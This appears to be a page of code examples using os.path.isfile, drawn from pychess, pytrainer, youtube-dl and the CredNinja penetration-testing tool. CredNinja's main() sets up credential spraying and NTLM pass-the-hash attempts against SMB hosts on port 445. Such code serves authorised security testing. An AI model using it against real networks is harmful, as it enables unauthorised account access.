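        print("missing expected artifact: %s" % artifact)
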
Example 40

Project: pychess
Source File: PgnImport.py
View license
    def do_import(self, filename, info=None, progressbar=None):
        DB_MAXINT_SHIFT = get_maxint_shift(self.engine)
        self.progressbar = progressbar

        orig_filename = filename
        count_source = self.conn.execute(self.count_source.where(source.c.name == orig_filename)).scalar()
        if count_source > 0:
            print("%s is already imported" % filename)
            return

        # collect new names not in the dict yet
        self.event_data = []
        self.site_data = []
        self.player_data = []
        self.annotator_data = []
        self.source_data = []

        # collect new games and commit them in big chunks for speed
        self.game_data = []
        self.bitboard_data = []
        self.stat_ins_data = []
        self.stat_upd_data = []
        self.tag_game_data = []

        if filename.startswith("http"):
            filename = download_file(filename, progressbar=progressbar)
            if filename is None:
                return
        else:
            if not os.path.isfile(filename):
                print("Can't open %s" % filename)
                return

        if filename.lower().endswith(".zip") and zipfile.is_zipfile(filename):
            zf = zipfile.ZipFile(filename, "r")
            files = [f for f in zf.namelist() if f.lower().endswith(".pgn")]
        else:
            zf = None
            files = [filename]

        for pgnfile in files:
            basename = os.path.basename(pgnfile)
            if progressbar is not None:
                GLib.idle_add(progressbar.set_text, "Reading %s ..." % basename)
            else:
                print("Reading %s ..." % pgnfile)

            if zf is None:
                size = os.path.getsize(pgnfile)
                handle = protoopen(pgnfile)
            else:
                size = zf.getinfo(pgnfile).file_size
                handle = io.TextIOWrapper(zf.open(pgnfile), encoding=PGN_ENCODING, newline='')

            cf = PgnBase(handle, [])

            # estimated game count
            all_games = max(size / 840, 1)
            self.CHUNK = 1000 if all_games > 5000 else 100

            get_id = self.get_id
            # use transaction to avoid autocommit slowness
            trans = self.conn.begin()
            try:
                i = 0
                for tagtext, movetext in read_games(handle):
                    tags = defaultdict(str, tagre.findall(tagtext))
                    if not tags:
                        print("Empty game #%s" % (i + 1))
                        continue

                    if self.cancel:
                        trans.rollback()
                        return

                    fenstr = tags.get("FEN")

                    variant = tags.get("Variant")
                    if variant:
                        if "fischer" in variant.lower() or "960" in variant:
                            variant = "Fischerandom"
                        else:
                            variant = variant.lower().capitalize()

                    # Fixes for some non-standard Chess960 .pgn
                    if fenstr and variant == "Fischerandom":
                        parts = fenstr.split()
                        parts[0] = parts[0].replace(".", "/").replace("0", "")
                        if len(parts) == 1:
                            parts.append("w")
                            parts.append("-")
                            parts.append("-")
                        fenstr = " ".join(parts)

                    if variant:
                        if variant not in name2variant:
                            print("Unknown variant: %s" % variant)
                            continue
                        variant = name2variant[variant].variant
                        if variant == NORMALCHESS:
                            # lichess uses tag [Variant "Standard"]
                            variant = 0
                            board = START_BOARD.clone()
                        else:
                            board = LBoard(variant)
                    elif fenstr:
                        variant = 0
                        board = LBoard()
                    else:
                        variant = 0
                        board = START_BOARD.clone()

                    if fenstr:
                        try:
                            board.applyFen(fenstr)
                        except SyntaxError as e:
                            print(_(
                                "The game #%s can't be loaded, because of an error parsing FEN")
                                % (i + 1), e.args[0])
                            continue
                    elif variant:
                        board.applyFen(FEN_START)

                    movelist = array("H")
                    comments = []
                    cf.error = None

                    # First we try to use simple_parse_movetext()
                    # assuming most games in a .pgn contain only moves
                    # without any comments/variations
                    simple = False
                    if not fenstr and not variant:
                        bitboards = []
                        simple = cf.simple_parse_movetext(movetext, board, movelist, bitboards)

                        if cf.error is not None:
                            print("ERROR in %s game #%s" % (pgnfile, i + 1), cf.error.args[0])
                            continue

                    # If simple_parse_movetext() finds any comments/variations
                    # we restart parsing with the full-featured parse_movetext()
                    if not simple:
                        movelist = array("H")
                        bitboards = None

                        # in case simple_parse_movetext failed we have to reset our lboard
                        if not fenstr and not variant:
                            board = START_BOARD.clone()

                        # parse movetext to create boards tree structure
                        boards = [board]
                        boards = cf.parse_movetext(movetext, boards[0], -1, pgn_import=True)

                        if cf.error is not None:
                            print("ERROR in %s game #%s" % (pgnfile, i + 1), cf.error.args[0])
                            continue

                        # create movelist and comments from boards tree
                        walk(boards[0], movelist, comments)

                    white = tags.get('White')
                    black = tags.get('Black')

                    if not movelist:
                        if (not comments) and (not white) and (not black):
                            print("Empty game #%s" % (i + 1))
                            continue

                    event_id = get_id(tags.get('Event'), event, EVENT)

                    site_id = get_id(tags.get('Site'), site, SITE)

                    game_date = tags.get('Date').strip()
                    try:
                        if game_date and '?' not in game_date:
                            ymd = game_date.split('.')
                            if len(ymd) == 3:
                                game_year, game_month, game_day = map(int, ymd)
                            else:
                                game_year, game_month, game_day = int(game_date[:4]), None, None
                        elif game_date and '?' not in game_date[:4]:
                            game_year, game_month, game_day = int(game_date[:4]), None, None
                        else:
                            game_year, game_month, game_day = None, None, None
                    except:
                        game_year, game_month, game_day = None, None, None

                    game_round = tags.get('Round')

                    white_fide_id = tags.get('WhiteFideId')
                    black_fide_id = tags.get('BlackFideId')

                    white_id = get_id(unicode(white), player, PLAYER, fide_id=white_fide_id)
                    black_id = get_id(unicode(black), player, PLAYER, fide_id=black_fide_id)

                    result = tags.get("Result")
                    if result in pgn2Const:
                        result = pgn2Const[result]
                    else:
                        print("Invalid Result tag in game #%s: %s" % (i + 1, result))
                        continue

                    white_elo = tags.get('WhiteElo')
                    white_elo = int(white_elo) if white_elo and white_elo.isdigit() else None

                    black_elo = tags.get('BlackElo')
                    black_elo = int(black_elo) if black_elo and black_elo.isdigit() else None

                    time_control = tags.get("TimeControl")

                    eco = tags.get("ECO")
                    eco = eco[:3] if eco else None

                    fen = tags.get("FEN")

                    board_tag = tags.get("Board")

                    annotator_id = get_id(tags.get("Annotator"), annotator, ANNOTATOR)

                    source_id = get_id(unicode(orig_filename), source, SOURCE, info=info)

                    game_id = self.next_id[GAME]
                    self.next_id[GAME] += 1

                    # annotated game
                    if bitboards is None:
                        for ply, board in enumerate(boards):
                            if ply == 0:
                                continue
                            bb = board.friends[0] | board.friends[1]
                            # Avoid including 'mate in x' .pgn collections
                            # and similar in the opening tree
                            if fen and "/pppppppp/8/8/8/8/PPPPPPPP/" not in fen:
                                ply = -1
                            self.bitboard_data.append({
                                'game_id': game_id,
                                'ply': ply,
                                'bitboard': bb - DB_MAXINT_SHIFT,
                            })

                            if ply <= STAT_PLY_MAX:
                                self.stat_ins_data.append({
                                    'ply': ply,
                                    'bitboard': bb - DB_MAXINT_SHIFT,
                                    'count': 0,
                                    'whitewon': 0,
                                    'blackwon': 0,
                                    'draw': 0,
                                    'white_elo_count': 0,
                                    'black_elo_count': 0,
                                    'white_elo': 0,
                                    'black_elo': 0,
                                })
                                self.stat_upd_data.append({
                                    '_ply': ply,
                                    '_bitboard': bb - DB_MAXINT_SHIFT,
                                    '_count': 1,
                                    '_whitewon': 1 if result == WHITEWON else 0,
                                    '_blackwon': 1 if result == BLACKWON else 0,
                                    '_draw': 1 if result == DRAW else 0,
                                    '_white_elo_count': 1 if white_elo is not None else 0,
                                    '_black_elo_count': 1 if black_elo is not None else 0,
                                    '_white_elo': white_elo if white_elo is not None else 0,
                                    '_black_elo': black_elo if black_elo is not None else 0,
                                })

                    # simple game
                    else:
                        for ply, bb in enumerate(bitboards):
                            if ply == 0:
                                continue
                            self.bitboard_data.append({
                                'game_id': game_id,
                                'ply': ply,
                                'bitboard': bb - DB_MAXINT_SHIFT,
                            })

                            if ply <= STAT_PLY_MAX:
                                self.stat_ins_data.append({
                                    'ply': ply,
                                    'bitboard': bb - DB_MAXINT_SHIFT,
                                    'count': 0,
                                    'whitewon': 0,
                                    'blackwon': 0,
                                    'draw': 0,
                                    'white_elo_count': 0,
                                    'black_elo_count': 0,
                                    'white_elo': 0,
                                    'black_elo': 0,
                                })
                                self.stat_upd_data.append({
                                    '_ply': ply,
                                    '_bitboard': bb - DB_MAXINT_SHIFT,
                                    '_count': 1,
                                    '_whitewon': 1 if result == WHITEWON else 0,
                                    '_blackwon': 1 if result == BLACKWON else 0,
                                    '_draw': 1 if result == DRAW else 0,
                                    '_white_elo_count': 1 if white_elo is not None else 0,
                                    '_black_elo_count': 1 if black_elo is not None else 0,
                                    '_white_elo': white_elo if white_elo is not None else 0,
                                    '_black_elo': black_elo if black_elo is not None else 0,
                                })

                    ply_count = tags.get("PlyCount")
                    if not ply_count and not fen:
                        ply_count = len(bitboards) if bitboards is not None else len(boards)

                    self.game_data.append({
                        'event_id': event_id,
                        'site_id': site_id,
                        'date_year': game_year,
                        'date_month': game_month,
                        'date_day': game_day,
                        'round': game_round,
                        'white_id': white_id,
                        'black_id': black_id,
                        'result': result,
                        'white_elo': white_elo,
                        'black_elo': black_elo,
                        'ply_count': ply_count,
                        'eco': eco,
                        'fen': fen,
                        'variant': variant,
                        'board': board_tag,
                        'time_control': time_control,
                        'annotator_id': annotator_id,
                        'source_id': source_id,
                        'movelist': movelist.tostring(),
                        'comments': unicode("|".join(comments)),
                    })

                    i += 1

                    if len(self.game_data) >= self.CHUNK:
                        if self.event_data:
                            self.conn.execute(self.ins_event, self.event_data)
                            self.event_data = []

                        if self.site_data:
                            self.conn.execute(self.ins_site, self.site_data)
                            self.site_data = []

                        if self.player_data:
                            self.conn.execute(self.ins_player,
                                              self.player_data)
                            self.player_data = []

                        if self.annotator_data:
                            self.conn.execute(self.ins_annotator,
                                              self.annotator_data)
                            self.annotator_data = []

                        if self.source_data:
                            self.conn.execute(self.ins_source, self.source_data)
                            self.source_data = []

                        self.conn.execute(self.ins_game, self.game_data)
                        self.game_data = []

                        if self.bitboard_data:
                            self.conn.execute(self.ins_bitboard, self.bitboard_data)
                            self.bitboard_data = []

                            self.conn.execute(self.ins_stat, self.stat_ins_data)
                            self.conn.execute(self.upd_stat, self.stat_upd_data)
                            self.stat_ins_data = []
                            self.stat_upd_data = []

                        if progressbar is not None:
                            GLib.idle_add(progressbar.set_fraction, i / float(all_games))
                            GLib.idle_add(progressbar.set_text, "%s games from %s imported" % (i, basename))
                        else:
                            print(pgnfile, i)

                if self.event_data:
                    self.conn.execute(self.ins_event, self.event_data)
                    self.event_data = []

                if self.site_data:
                    self.conn.execute(self.ins_site, self.site_data)
                    self.site_data = []

                if self.player_data:
                    self.conn.execute(self.ins_player, self.player_data)
                    self.player_data = []

                if self.annotator_data:
                    self.conn.execute(self.ins_annotator, self.annotator_data)
                    self.annotator_data = []

                if self.source_data:
                    self.conn.execute(self.ins_source, self.source_data)
                    self.source_data = []

                if self.game_data:
                    self.conn.execute(self.ins_game, self.game_data)
                    self.game_data = []

                if self.bitboard_data:
                    self.conn.execute(self.ins_bitboard, self.bitboard_data)
                    self.bitboard_data = []

                    self.conn.execute(self.ins_stat, self.stat_ins_data)
                    self.conn.execute(self.upd_stat, self.stat_upd_data)
                    self.stat_ins_data = []
                    self.stat_upd_data = []

                if progressbar is not None:
                    GLib.idle_add(progressbar.set_fraction, i / float(all_games))
                    GLib.idle_add(progressbar.set_text, "%s games from %s imported" % (i, basename))
                else:
                    print(pgnfile, i)
                trans.commit()

            except SQLAlchemyError as e:
                trans.rollback()
                print("Importing %s failed! \n%s" % (pgnfile, e))
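
do_import() treats anything starting with "http" as a download and everything else as a local path that must pass os.path.isfile() before being opened. A minimal sketch of that dispatch; the function name is hypothetical, and the real code hands URLs to a downloader:

import os

def resolve_input(name):
    # URLs are handled elsewhere; local names must be existing files.
    if name.startswith("http"):
        return name  # handed to a downloader in the real code
    if not os.path.isfile(name):
        print("Can't open %s" % name)
        return None
    return name

pgn = resolve_input("games.pgn")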

Example 41

Project: pychess
Source File: Background.py
View license
def newTheme(widget, background=None):
    global surface, provider, loldcolor, doldcolor

    style_ctxt = widget.get_style_context()

    # get colors from theme

    # bg color
    found, bgcol = style_ctxt.lookup_color("bg_color")
    if not found:
        found, bgcol = style_ctxt.lookup_color("theme_bg_color")
        if not found:
            # fallback value
            bgcol = Gdk.RGBA(red=0.929412,
                             green=0.929412,
                             blue=0.929412,
                             alpha=1.0)

    # bg selected color
    found, bgsel = style_ctxt.lookup_color("theme_selected_bg_color")
    if not found:
        # fallback value
        bgsel = Gdk.RGBA(red=0.290, green=0.565, blue=0.851, alpha=1.0)

    # fg color
    found, fgcol = style_ctxt.lookup_color("fg_color")
    if not found:
        found, fgcol = style_ctxt.lookup_color("theme_fg_color")
        if not found:
            fgcol = Gdk.RGBA(red=0.180392,
                             green=0.203922,
                             blue=0.211765,
                             alpha=1.000000)

    # base color
    found, basecol = style_ctxt.lookup_color("base_color")
    if not found:
        found, basecol = style_ctxt.lookup_color("theme_base_color")
        if not found:
            basecol = Gdk.RGBA(red=0.929412,
                               green=0.929412,
                               blue=0.929412,
                               alpha=1.0)

    # text color
    found, textcol = style_ctxt.lookup_color("text_color")
    if not found:
        found, textcol = style_ctxt.lookup_color("theme_text_color")
        if not found:
            textcol = Gdk.RGBA(red=0.180392,
                               green=0.203922,
                               blue=0.211765,
                               alpha=1.0)

    def get_col(col, mult):
        red = col.red * mult
        green = col.green * mult
        blue = col.blue * mult
        if red > 1.0:
            red = 1.0
        if green > 1.0:
            green = 1.0
        if blue > 1.0:
            blue = 1.0
        if red == 1 and green == 1 and blue == 1:
            return Gdk.RGBA(0.99, 0.99, 0.99, 1.0)
        else:
            return Gdk.RGBA(red, green, blue, 1.0)

    # derive other colors
    bgacol = get_col(bgcol, 0.9)                # bg_active
    dcol = get_col(bgcol, 0.7)                  # dark
    darksel = get_col(bgsel, 0.71)              # dark selected
    dpcol = get_col(bgcol, 0.71)                # dark prelight
    dacol = get_col(dcol, 0.9)                  # dark_active
    lcol = get_col(bgcol, 1.3)                  # light color
    lightsel = get_col(bgsel, 1.3)              # light selected
    fgsel = Gdk.RGBA(0.99, 0.99, 0.99, 1.0)     # fg selected
    fgpcol = get_col(fgcol, 1.054)              # fg prelight
    fgacol = Gdk.RGBA(0.0, 0.0, 0.0, 1.0)       # fg active
    textaacol = Gdk.RGBA(
        min(
            (basecol.red + textcol.red) / 2., 1.0), min(
                (basecol.green + textcol.green) / 2., 1.0), min(
                    (basecol.blue + textcol.blue) / 2., 1.0))  # text_aa

    data = "@define-color p_bg_color " + hexcol(bgcol) + ";" \
        "@define-color p_bg_prelight " + hexcol(bgcol) + ";" \
        "@define-color p_bg_active " + hexcol(bgacol) + ";" \
        "@define-color p_bg_selected " + hexcol(bgsel) + ";" \
        "@define-color p_bg_insensitive " + hexcol(bgcol) + ";" \
        "@define-color p_base_color " + hexcol(basecol) + ";" \
        "@define-color p_dark_color " + hexcol(dcol) + ";" \
        "@define-color p_dark_prelight " + hexcol(dpcol) + ";" \
        "@define-color p_dark_active " + hexcol(dacol) + ";" \
        "@define-color p_dark_selected " + hexcol(darksel) + ";" \
        "@define-color p_text_aa " + hexcol(textaacol) + ";" \
        "@define-color p_light_color " + hexcol(lcol) + ";" \
        "@define-color p_light_selected " + hexcol(lightsel) + ";" \
        "@define-color p_fg_color " + hexcol(fgcol) + ";" \
        "@define-color p_fg_prelight " + hexcol(fgpcol) + ";" \
        "@define-color p_fg_selected " + hexcol(fgsel) + ";" \
        "@define-color p_fg_active " + hexcol(fgacol) + ";"

    if provider is not None:
        style_ctxt.remove_provider_for_screen(Gdk.Screen.get_default(), provider)

    provider = Gtk.CssProvider.new()
    provider.load_from_data(data.encode())
    style_ctxt.add_provider_for_screen(Gdk.Screen.get_default(), provider,
                                       Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)

    lnewcolor = bgcol
    dnewcolor = dcol

    # check if changed
    if loldcolor and background is None:
        if lnewcolor.red == loldcolor.red and \
           lnewcolor.green == loldcolor.green and \
           lnewcolor.blue == loldcolor.blue and \
           dnewcolor.red == doldcolor.red and \
           dnewcolor.green == doldcolor.green and \
           dnewcolor.blue == doldcolor.blue:
            return

    loldcolor = lnewcolor
    doldcolor = dnewcolor

    # global colors have been set up
    # now set colors on startup panel
    lnewcolor = style_ctxt.lookup_color("p_bg_color")[1]
    dnewcolor = style_ctxt.lookup_color("p_dark_color")[1]

    colors = [
        int(lnewcolor.red * 255), int(lnewcolor.green * 255),
        int(lnewcolor.blue * 255), int(dnewcolor.red * 255),
        int(dnewcolor.green * 255), int(dnewcolor.blue * 255)
    ]

    if background is None:
        background = conf.get("welcome_image", addDataPrefix("glade/clear.png"))

    if not background.endswith("clear.png"):
        pixbuf = GdkPixbuf.Pixbuf.new_from_file(background)
        # for frmat in GdkPixbuf.Pixbuf.get_formats():
        #     print(frmat.get_extensions())
        surface = Gdk.cairo_surface_create_from_pixbuf(pixbuf, 0, None)
        return

    # Check if a cache has been saved
    temppng = addUserCachePrefix("temp.png")
    if path.isfile(temppng):
        fyle = open(temppng, "rb")
        # Check if the cache was made while using the same theme
        if list(fyle.read(6)) == colors:
            surface = cairo.ImageSurface.create_from_png(fyle)
            return

    # Get a mostly transparent, shadowy image
    imgsurface = cairo.ImageSurface.create_from_png(background)
    avgalpha = 108 / 255.

    surface = cairo.ImageSurface(cairo.FORMAT_RGB24, imgsurface.get_width(),
                                 imgsurface.get_height())
    ctx = cairo.Context(surface)
    if lnewcolor.blue * 65535 - dnewcolor.blue * 65535 > 0:
        midtone = dnewcolor.red * 65535 / (3 * (
            lnewcolor.blue * 65535 - dnewcolor.blue * 65535) * (1 - avgalpha))
        ctx.set_source_rgb(lnewcolor.red / 2 + dnewcolor.red * midtone / 2,
                           lnewcolor.green / 2 + dnewcolor.green * midtone / 2,
                           lnewcolor.blue / 2 + dnewcolor.blue * midtone / 2)
        ctx.paint()
    ctx.set_source_surface(imgsurface, 0, 0)
    ctx.paint_with_alpha(.8)

    # Save a cache for later use. Save 'newcolor' in the first three pixels
    # to check for theme changes between two instances
    fyle = open(temppng, "wb")
    fyle.write(bytes(colors))
    surface.write_to_png(fyle)
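
newTheme() calls path.isfile() (os.path imported as path) to decide whether a composited background can be read back from a cache file instead of being rebuilt. A minimal sketch of the check-cache-else-build pattern; the names are hypothetical:

import os

def load_or_build(cache_path, build):
    # Return cached bytes when the cache file exists; otherwise call
    # build() (any zero-argument callable returning bytes) and save.
    if os.path.isfile(cache_path):
        with open(cache_path, "rb") as fyle:
            return fyle.read()
    data = build()
    with open(cache_path, "wb") as fyle:
        fyle.write(data)
    return data

data = load_or_build("/tmp/background.cache", lambda: b"rendered-image-bytes")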

Example 42

Project: pytrainer
Source File: windowimportdata.py
View license
    def on_buttonCSVImport_clicked(self, widget):
        logging.debug('>>')
        #Determine values
        dateCol = self.cbCSVDate.get_active()
        distanceCol = self.cbCSVDistance.get_active()
        durationCol = self.cbCSVDuration.get_active()
        titleCol = self.cbCSVTitle.get_active()
        sportCol = self.cbCSVSport.get_active()
        avgspeedCol = self.cbCSVAvgSpeed.get_active()
        maxspeedCol = self.cbCSVMaxSpeed.get_active()
        calCol = self.cbCSVCal.get_active()
        accCol = self.cbCSVAccent.get_active()
        desCol = self.cbCSVDescent.get_active()
        hrCol = self.cbCSVHR.get_active()
        maxHRCol = self.cbCSVMaxHR.get_active()
        paceCol = self.cbCSVPace.get_active()
        maxPaceCol = self.cbCSVMaxPace.get_active()
        commentsCol = self.cbCSVComments.get_active()

        if dateCol == 0:
            #Error: need to have at least a date column
            self.updateStatusbar(self.statusbarCSVImport, _("ERROR: Must define at least a date column"))
            return

        #Import...
        #Get selected file
        if not os.path.isfile(self.CSVfilename):
            return
        #Read as delimited file
        csvfile = open(self.CSVfilename, 'rb')
        reader = csv.reader(csvfile, delimiter=self.delimiter)
        #Process File

        for i, row in enumerate(reader):
            if self.has_header and i==0:
                #Ignore first row
                continue
            if not row:
                continue
            data = {}
            #Determine dates
            _date = Date().getDateTime(row[dateCol-1])
            #year, month, day = date.split("-")
            date = _date[1].strftime("%Y-%m-%d")
            zuluDateTime = _date[0].strftime("%Y-%m-%dT%H:%M:%SZ")
            localDateTime = str(_date[1])
            data['date'] = date
            data['date_time_utc'] = zuluDateTime
            data['date_time_local'] = localDateTime
            if distanceCol:
                try:
                    data['distance'] = locale.atof(row[distanceCol-1])
                except:
                    data['distance'] = 0
            else:
                data['distance'] = 0
            if durationCol:
                #calculate duration in sec...
                try:
                    _duration = row[durationCol-1]
                except:
                    _duration = 0
                if _duration.count(':') == 2:
                    #Have 00:00:00 duration
                    h, m, s = _duration.split(':')
                    try:
                        durationSec = int(h)*3600 + int(m)*60 + int(s)
                    except:
                        logging.debug("Error calculating duration for '%s'" % _duration)
                        durationSec = None
                else:
                    try:
                        durationSec = locale.atoi(_duration)
                    except:
                        #Unknown duration
                        logging.debug("Could not determine duration for '%s'" % _duration)
                        durationSec = None
                if durationSec is not None:
                    data['duration'] = durationSec
                    data['time'] = str(durationSec)
            if titleCol:
                try:
                    data['title'] = row[titleCol-1]
                except:
                    pass
            if self.checkbCSVForceSport.get_active():
                sport_id = self.pytrainer_main.record.getSportId(self.comboCSVForceSport.get_active_text(),add=True)
                data['sport'] = sport_id
            elif sportCol:
                #retrieving sport id (adding sport if it doesn't exist yet)
                sport_id = self.pytrainer_main.record.getSportId(row[sportCol-1],add=True)
                data['sport'] = sport_id
            else:
                self.comboCSVForceSport.set_active(0)
                sport_id = self.pytrainer_main.record.getSportId(self.comboCSVForceSport.get_active_text(),add=True)
                data['sport'] = sport_id

            if avgspeedCol:
                #
                try:
                    data['average'] = locale.atof(row[avgspeedCol-1])
                except:
                    pass
            if maxspeedCol:
                try:
                    data['maxspeed'] = locale.atof(row[maxspeedCol-1])
                except:
                    pass
            if calCol:
                try:
                    data['calories'] = locale.atoi(row[calCol-1])
                except:
                    pass
            if accCol:
                try:
                    data['upositive'] = locale.atof(row[accCol-1])
                except:
                    pass
            if desCol:
                try:
                    data['unegative'] = locale.atof(row[desCol-1])
                except:
                    pass
            if hrCol:
                try:
                    data['beats'] = locale.atof(row[hrCol-1])
                except:
                    pass
            if maxHRCol:
                try:
                    data['maxbeats'] = locale.atof(row[maxHRCol-1])
                except:
                    pass
            if paceCol:
                try:
                    data['pace'] = locale.atof(row[paceCol-1])
                except:
                    pass
            if maxPaceCol:
                try:
                    data['maxpace'] = locale.atof(row[maxPaceCol-1])
                except:
                    pass
            if commentsCol:
                try:
                    data['comments'] = row[commentsCol-1]
                except:
                    pass

            #Insert into DB
            logging.debug("Data: %s", data)
            self.pytrainer_main.ddbb.insert_dict('records', data)
        #Display message....
        self.updateStatusbar(self.statusbarCSVImport, _("Import completed. %d rows processed") % i)
        #Disable import button
        self.buttonCSVImport.set_sensitive(0)
        logging.debug('<<')
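
The duration handling above accepts either an HH:MM:SS string or a locale-formatted number of seconds. A minimal standalone sketch of that logic (hypothetical helper, not part of pytrainer):

import locale

def parse_duration_seconds(text):
    """Return seconds from 'HH:MM:SS' or a locale-formatted number, else None."""
    if text.count(':') == 2:
        h, m, s = text.split(':')
        try:
            return int(h) * 3600 + int(m) * 60 + int(s)
        except ValueError:
            return None
    try:
        return locale.atoi(text)
    except ValueError:
        return None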

Example 43

Project: CredNinja
Source File: CredNinja.py
View license
def main():
    global output_file_handler, settings, text_green, text_blue, text_yellow, text_red, text_end
    print(text_blue + """


   .d8888b.                       888 888b    888 d8b           d8b          
  d88P  Y88b                      888 8888b   888 Y8P           Y8P          
  888    888                      888 88888b  888                            
  888        888d888 .d88b.   .d88888 888Y88b 888 888 88888b.  8888  8888b.  
  888        888P"  d8P  Y8b d88" 888 888 Y88b888 888 888 "88b "888     "88b 
  888    888 888    88888888 888  888 888  Y88888 888 888  888  888 .d888888 
  Y88b  d88P 888    Y8b.     Y88b 888 888   Y8888 888 888  888  888 888  888 
   "Y8888P"  888     "Y8888   "Y88888 888    Y888 888 888  888  888 "Y888888 
                                                                888          
                                                               d88P          
                                                             888P"           

                    v{} (Built {}) - Chris King (@raikiasec)

                         For help: ./CredNinja.py -h
""".format(version_number,version_build) + text_end)


    if sys.version_info < (3,0):
        print("ERROR: CredNinja runs on Python 3.  Run as \"./CredNinja.py\" or \"python3 CredNinja.py\"!")
        sys.exit(1)
    args = parse_cli_args()
    settings['os'] = args.os
    settings['domain'] = args.domain
    settings['timeout'] = args.timeout
    settings['delay'] = args.delay
    settings['users'] = args.users
    settings['users_time'] = args.users_time
    settings['scan'] = args.scan
    settings['scan_timeout'] = args.scan_timeout
    settings['no_color'] = args.no_color
    hosts_to_check = []
    creds_to_check = []
    mode = 'all'
    if settings['no_color']:
        text_blue = ''
        text_green = ''
        text_red = ''
        text_yellow = ''
        text_end = ''
    if os.path.isfile(args.accounts):
        with open(args.accounts) as accountfile:
            for line in accountfile:
                if line.strip():
                    parts = line.strip().split(args.passdelimiter,1)
                    if len(parts) != 2:
                        print(text_red + "ERROR: Credential '" + line.strip() + "' did not have the password delimiter" + text_end)
                        sys.exit(1)
                    creds_to_check.append(parts)
    else:
        parts = args.accounts.strip().split(args.passdelimiter,1)
        if len(parts) != 2:
            print(text_red + "ERROR: Credential '" + args.accounts.strip() + "' did not have the password delimiter" + text_end)
            sys.exit(1)
        creds_to_check.append(parts)

    if os.path.isfile(args.servers):
        with open(args.servers) as serverfile:
            for line in serverfile:
                if line.strip():
                    hosts_to_check.append(line.strip())
    else:
        hosts_to_check.append(args.servers)
    if len(hosts_to_check) == 0 or len(creds_to_check) == 0:
        print(text_red + "ERROR: You must supply hosts and credentials at least!" + text_end)
        sys.exit(1)
    
    mode = 'a'
    if args.invalid:
        mode = 'i'
    if args.valid:
        mode = 'v'
    if args.invalid and args.valid:
        mode = 'a'

    if args.output:
        output_file_handler = open(args.output, 'w')
    
    command_list = ['smbclient', '-U', '', '', '', '-c', 'dir']
    if args.ntlm and shutil.which('pth-smbclient') is None:
        print(text_red + "ERROR: pth-smbclient is not found!  Make sure you install it (or use Kali!)" + text_end)
        sys.exit(1)
    elif args.ntlm:
        command_list[0] = 'pth-smbclient'
        command_list.append('--pw-nt-hash')
    passwd_header = 'Password'
    if command_list[0] == 'pth-smbclient':
        passwd_header = 'Hash'

    if (len(hosts_to_check) * len(creds_to_check)) < args.threads:
        args.threads = len(hosts_to_check) * len(creds_to_check)

    try:
        if settings['os'] or settings['domain'] or settings['users']:
            print(text_yellow + ("%-35s %-35s %-35s %-25s %s" % ("Server", "Username", passwd_header, "Response", "Info")) + text_end)
        else:
            print(text_yellow + ("%-35s %-35s %-35s %-25s " % ("Server", "Username", passwd_header, "Response")) + text_end)
        print(text_yellow + "------------------------------------------------------------------------------------------------------------------------------------------------------" + text_end)

        if args.stripe == None:
            total = len(hosts_to_check)
            done = -1
            last_status_report = -1
            if settings['scan']:
                print(text_green + "[!] Starting scan of port 445 on all " + str(len(hosts_to_check)) + " hosts...." +  text_end)
            for host in hosts_to_check:
                done += 1
                if settings['scan']:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.settimeout(settings['scan_timeout'])
                    percent_done = int((done / total) * 100)
                    if (percent_done%5 == 0 and percent_done != last_status_report):
                        print(text_green + "[*] " + str(percent_done) + "% done... [" + str(done) + "/" + str(total) + "]" + text_end)
                        last_status_report = percent_done
                    try:
                        s.connect((host,445))
                        s.close()
                    except Exception:
                        print("%-35s %-35s %-35s %-25s" % (host, "N/A", "N/A", text_red + "Failed Portscan" + text_end))
                        continue
                for cred in creds_to_check:
                    credQueue.put([host, cred])
        else:
            if len(hosts_to_check) < len(creds_to_check):
                print(text_red + "ERROR: For striping to work, you must have the same number or more hosts than you do creds!"  + text_end)
                sys.exit(1)
            if (len(creds_to_check) < args.threads):
                args.threads = len(creds_to_check)
            random.shuffle(hosts_to_check)
            for i in range(len(creds_to_check)):
                credQueue.put([hosts_to_check[i], creds_to_check[i]])

        thread_list = []
        for i in range(args.threads):
            thread_list.append(CredThread(mode, command_list))
        for t in thread_list:
            t.daemon = True
            t.start()

        for t in thread_list:
            t.join()
    except KeyboardInterrupt:
        print("\nQuitting!")
        sys.exit(1)
    if output_file_handler is not None:
        output_file_handler.close()
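
The accounts and servers arguments above follow the same pattern: if os.path.isfile() says the argument names an existing file, read one entry per line; otherwise treat the argument itself as a single literal entry. A minimal sketch of that pattern (hypothetical helper, not CredNinja's API):

import os

def load_entries(value):
    # File path: one entry per non-blank line. Otherwise: the literal value.
    if os.path.isfile(value):
        with open(value) as handle:
            return [line.strip() for line in handle if line.strip()]
    return [value]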

Example 44

Project: youtube-dl
Source File: http.py
View license
    def real_download(self, filename, info_dict):
        url = info_dict['url']
        tmpfilename = self.temp_name(filename)
        stream = None

        # Do not include the Accept-Encoding header
        headers = {'Youtubedl-no-compression': 'True'}
        add_headers = info_dict.get('http_headers')
        if add_headers:
            headers.update(add_headers)
        basic_request = sanitized_Request(url, None, headers)
        request = sanitized_Request(url, None, headers)

        is_test = self.params.get('test', False)

        if is_test:
            request.add_header('Range', 'bytes=0-%s' % str(self._TEST_FILE_SIZE - 1))

        # Establish possible resume length
        if os.path.isfile(encodeFilename(tmpfilename)):
            resume_len = os.path.getsize(encodeFilename(tmpfilename))
        else:
            resume_len = 0

        open_mode = 'wb'
        if resume_len != 0:
            if self.params.get('continuedl', True):
                self.report_resuming_byte(resume_len)
                request.add_header('Range', 'bytes=%d-' % resume_len)
                open_mode = 'ab'
            else:
                resume_len = 0

        count = 0
        retries = self.params.get('retries', 0)
        while count <= retries:
            # Establish connection
            try:
                data = self.ydl.urlopen(request)
                # When trying to resume, the Content-Range HTTP header of the response has to
                # be checked to match the value of the requested Range HTTP header. This is due
                # to webservers that don't support resuming and serve the whole file with no
                # Content-Range set in the response despite the requested Range (see
                # https://github.com/rg3/youtube-dl/issues/6057#issuecomment-126129799)
                if resume_len > 0:
                    content_range = data.headers.get('Content-Range')
                    if content_range:
                        content_range_m = re.search(r'bytes (\d+)-', content_range)
                        # Content-Range is present and matches requested Range, resume is possible
                        if content_range_m and resume_len == int(content_range_m.group(1)):
                            break
                    # Content-Range is either not present or invalid. Assume the remote
                    # webserver is sending the whole file; resume is not possible, so wipe
                    # the local file and perform a full redownload.
                    self.report_unable_to_resume()
                    resume_len = 0
                    open_mode = 'wb'
                break
            except (compat_urllib_error.HTTPError, ) as err:
